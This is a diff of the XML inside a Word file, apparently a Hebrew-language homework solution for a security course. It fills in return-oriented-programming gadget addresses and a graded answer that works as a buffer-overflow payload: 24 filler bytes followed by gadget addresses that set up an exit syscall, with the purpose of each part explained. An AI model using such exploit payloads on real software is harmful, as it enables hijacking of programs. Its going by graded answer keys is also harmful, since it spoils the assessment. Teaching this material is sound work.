-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6888,7 +6648,6 @@
               </w:rPr>
               <w:t>syscall</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6981,20 +6740,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %</w:t>
+              <w:t>pop %rax</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rax</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7052,7 +6799,18 @@
                 <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>0x401da0</w:t>
+              <w:t>0x401da</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7119,20 +6877,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %</w:t>
+              <w:t>op %rsi</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rsi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7229,7 +6975,29 @@
                 <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>0x4008f0</w:t>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>x4008f</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7307,9 +7075,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %</w:t>
+              <w:t>dd %r15, %r</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7318,7 +7085,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>r</w:t>
+              <w:t>d</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7328,19 +7095,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
               <w:t>i</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7407,7 +7163,29 @@
                 <w:highlight w:val="yellow"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>0x400e10</w:t>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>x400e1</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:highlight w:val="yellow"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>e</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7530,10 +7308,11 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %</w:t>
+              <w:t>ush %rbp</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7541,12 +7320,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rbp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7554,7 +7329,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>m</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7563,9 +7339,11 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
+              <w:t>ov %rsp, %rbp</w:t>
             </w:r>
-            <w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7573,9 +7351,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7584,9 +7360,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rsp</w:t>
+              <w:t>c</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7595,9 +7370,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>, %</w:t>
+              <w:t xml:space="preserve">all </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7606,12 +7380,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rbp</w:t>
+              <w:t>*</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7619,59 +7390,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c</w:t>
+              <w:t>%rax</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>*</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>%</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rax</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7818,21 +7538,8 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>בינארים</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7863,66 +7570,923 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>\xHH</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. לדוגמה, אם הקלט הוא האות </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ואחריה בית עם ערך </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x80</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ש</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">אחריו </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x90</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> כתבו </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“a\x80\x90”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> אין חשיבות לפלט ש</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>יוד</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>פס לגבי נכונות הסיסמא.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (15 נקודות)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>הקלט שיגרום לתוכנית לצאת עם ערך היציאה הרצוי הוא:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Calibri"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t>\</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xHH</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. לדוגמה, אם הקלט הוא האות </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ואחריה בית עם ערך </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0x80</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x6d\x1b\x40\x00\x00\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x71\x0e\x40\x00\x00\x00\x00\x00\x3c\x00\x00\x00\x00\x00\x00\x00\x78\x11\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">24 הבתים הראשונים (שערכם שרירותי ובחרנו שיהיו </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>0x61=’a’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) נועדו על מנת למלא את </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ואת הערך של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rbx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> במחסנית.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:bidi/>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8 הבתים הבאים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>\x6d\x1b\x40\x00\x00\x00\x00\x00</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> הם הכתובת של הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>“pop %rdi”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מהסעיף הקודם שבעזרתה נעדכן את הערך של </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rdi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שצפוי להכיל את ערך היציאה מהתוכנית לאחר שנבצע </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>syscall</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> עבור </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>rax=60</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> כלומר </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi" w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">8 הבתים הבאים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
